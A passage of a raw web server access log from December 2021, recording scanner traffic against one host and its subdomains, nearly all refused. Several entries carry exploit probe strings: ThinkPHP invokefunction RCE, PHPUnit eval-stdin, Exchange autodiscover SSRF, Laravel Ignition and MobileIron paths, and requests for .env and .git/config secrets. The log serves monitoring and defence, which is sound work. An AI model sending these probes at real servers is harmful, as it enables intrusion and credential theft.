94.232.43.63] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:13:21:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.236.109] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Dec/2021:14:13:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Dec/2021:14:33:29 +0000] 400 - OPTIONS http 64.22.31.253 "/" [Client 191.96.168.182] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "-" [04/Dec/2021:15:43:20 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Dec/2021:16:31:07 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Dec/2021:16:59:42 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:17:09:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Dec/2021:18:00:23 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Dec/2021:19:35:32 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [04/Dec/2021:19:48:17 +0000] 444 - GET https exchange.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [04/Dec/2021:20:00:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Dec/2021:20:22:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Dec/2021:20:41:25 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Dec/2021:20:41:26 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Dec/2021:22:10:19 +0000] 400 - - http localhost "-" [Client 194.48.199.78] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:22:10:19 +0000] 400 - - https localhost "-" [Client 194.48.199.78] [Length 154] [Gzip -] "-" "-" [04/Dec/2021:22:28:54 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Dec/2021:23:56:43 +0000] 444 - GET https owa.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [05/Dec/2021:00:33:06 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Dec/2021:00:33:06 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [05/Dec/2021:00:59:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:01:00:25 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.199] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:01:23:06 +0000] 400 - POST https localhost "-" [Client 45.155.205.233] [Length 154] [Gzip -] "-" "-" [05/Dec/2021:01:42:01 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.83.66.200] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [05/Dec/2021:01:42:01 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 45.83.66.204] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [05/Dec/2021:01:59:49 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:02:01:49 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:02:02:17 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.209.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:02:32:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 159.203.99.240] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" "-" [05/Dec/2021:02:36:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Dec/2021:02:37:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [05/Dec/2021:02:38:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:02:58:25 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.199] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:04:33:04 +0000] 444 - GET https sql.moralanimal.net "/.git/config" [Client 5.2.70.192] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [05/Dec/2021:05:24:21 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 185.156.72.51] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [05/Dec/2021:07:41:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Dec/2021:08:08:05 +0000] 444 - GET https io.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [05/Dec/2021:08:16:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 46.101.201.163] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [05/Dec/2021:08:58:02 +0000] 400 - GET https localhost "/" [Client 167.99.133.28] [Length 154] [Gzip -] "-" "-" [05/Dec/2021:08:58:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.133.28] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [05/Dec/2021:09:43:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.236.109] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:10:31:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.194] [Length 0] [Gzip -] "-" "-" [05/Dec/2021:10:47:58 +0000] 444 - GET https www.mudvod.tv "/" [Client 23.183.82.218] [Length 0] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "https://www.mudvod.tv" [05/Dec/2021:10:57:34 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.38] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:11:05:38 +0000] 400 - HEAD http localhost "/" [Client 134.209.43.189] [Length 0] [Gzip -] "-" "-" [05/Dec/2021:11:05:38 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 134.209.43.189] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:38 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 134.209.43.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:39 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 134.209.43.189] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:39 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 134.209.43.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:39 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 134.209.43.189] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:39 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 134.209.43.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:40 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 134.209.43.189] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:40 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 134.209.43.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:40 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 134.209.43.189] [Length 252] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [05/Dec/2021:11:05:40 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 134.209.43.189] [Length 0] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [05/Dec/2021:11:05:40 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 134.209.43.189] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:41 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 134.209.43.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 134.209.43.189] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:11:05:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 134.209.43.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [05/Dec/2021:12:30:42 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:12:50:40 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:13:43:04 +0000] 444 - GET https mx.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [05/Dec/2021:13:47:16 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:15:01:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [05/Dec/2021:15:01:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [05/Dec/2021:15:09:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Dec/2021:15:24:10 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [05/Dec/2021:16:03:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.98] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:16:33:35 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:17:04:50 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:18:11:43 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [05/Dec/2021:18:11:44 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [05/Dec/2021:18:12:58 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:18:20:39 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.51.210] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [05/Dec/2021:18:42:36 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [05/Dec/2021:18:47:40 +0000] 444 - GET https webmail.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [05/Dec/2021:18:47:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.59] [Length 0] [Gzip -] "-" "-" [05/Dec/2021:18:47:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "-" "-" [05/Dec/2021:18:47:48 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [05/Dec/2021:19:49:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 159.89.194.175] [Length 0] [Gzip -] "-" "-" [05/Dec/2021:19:51:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:20:28:02 +0000] 400 - POST https localhost "-" [Client 45.155.205.233] [Length 154] [Gzip -] "-" "-" [05/Dec/2021:21:27:05 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.212.72] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [05/Dec/2021:21:34:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [05/Dec/2021:22:38:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.59] [Length 0] [Gzip -] "-" "-" [05/Dec/2021:22:38:31 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "-" "-" [06/Dec/2021:00:44:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.58] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:00:44:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.58] [Length 252] [Gzip -] "-" "-" [06/Dec/2021:00:44:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [06/Dec/2021:01:27:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Dec/2021:02:06:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [06/Dec/2021:02:19:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.126] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:02:24:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:02:44:31 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.195.178] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:02:57:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.209.45] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Dec/2021:04:32:24 +0000] 444 - POST https 64.22.31.253 "/_ignition/execute-solution" [Client 212.147.66.94] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [06/Dec/2021:04:32:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 212.147.66.94] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [06/Dec/2021:04:32:25 +0000] 444 - GET https 64.22.31.253 "/script" [Client 212.147.66.94] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [06/Dec/2021:04:32:26 +0000] 444 - GET https 64.22.31.253 "/manager/html" [Client 212.147.66.94] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [06/Dec/2021:04:32:26 +0000] 444 - GET https 64.22.31.253 "/wp-login.php" [Client 212.147.66.94] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [06/Dec/2021:04:32:27 +0000] 444 - GET https 64.22.31.253 "/?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=k0n3gw93" [Client 212.147.66.94] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [06/Dec/2021:04:32:27 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 212.147.66.94] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [06/Dec/2021:05:08:01 +0000] 400 - - http localhost "-" [Client 27.124.5.32] [Length 154] [Gzip -] "-" "-" [06/Dec/2021:05:08:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 27.124.5.32] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:05:08:03 +0000] 400 - - https localhost "-" [Client 27.124.5.32] [Length 154] [Gzip -] "-" "-" [06/Dec/2021:05:08:03 +0000] 400 - - http localhost "-" [Client 27.124.5.32] [Length 154] [Gzip -] "-" "-" [06/Dec/2021:05:08:13 +0000] 400 - - https localhost "-" [Client 27.124.5.32] [Length 0] [Gzip -] "-" "-" [06/Dec/2021:05:08:15 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 27.124.5.32] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:05:08:16 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 27.124.5.32] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:05:08:16 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 27.124.5.32] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:05:59:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [06/Dec/2021:06:01:31 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:32 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:33 +0000] 444 - POST https 64.22.31.253 "/dns-query" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:34 +0000] 444 - POST https 64.22.31.253 "/dns-query" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:35 +0000] 444 - GET https 64.22.31.253 "/query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:35 +0000] 444 - GET https 64.22.31.253 "/query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:36 +0000] 444 - POST https 64.22.31.253 "/query" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:37 +0000] 444 - POST https 64.22.31.253 "/query" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:38 +0000] 444 - GET https 64.22.31.253 "/resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:39 +0000] 444 - GET https 64.22.31.253 "/resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:40 +0000] 444 - POST https 64.22.31.253 "/resolve" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:40 +0000] 444 - POST https 64.22.31.253 "/resolve" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:41 +0000] 444 - GET https 64.22.31.253 "/?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:42 +0000] 444 - GET https 64.22.31.253 "/?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:43 +0000] 444 - POST https 64.22.31.253 "/" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:01:43 +0000] 444 - POST https 64.22.31.253 "/" [Client 47.243.233.244] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [06/Dec/2021:06:48:43 +0000] 444 - GET 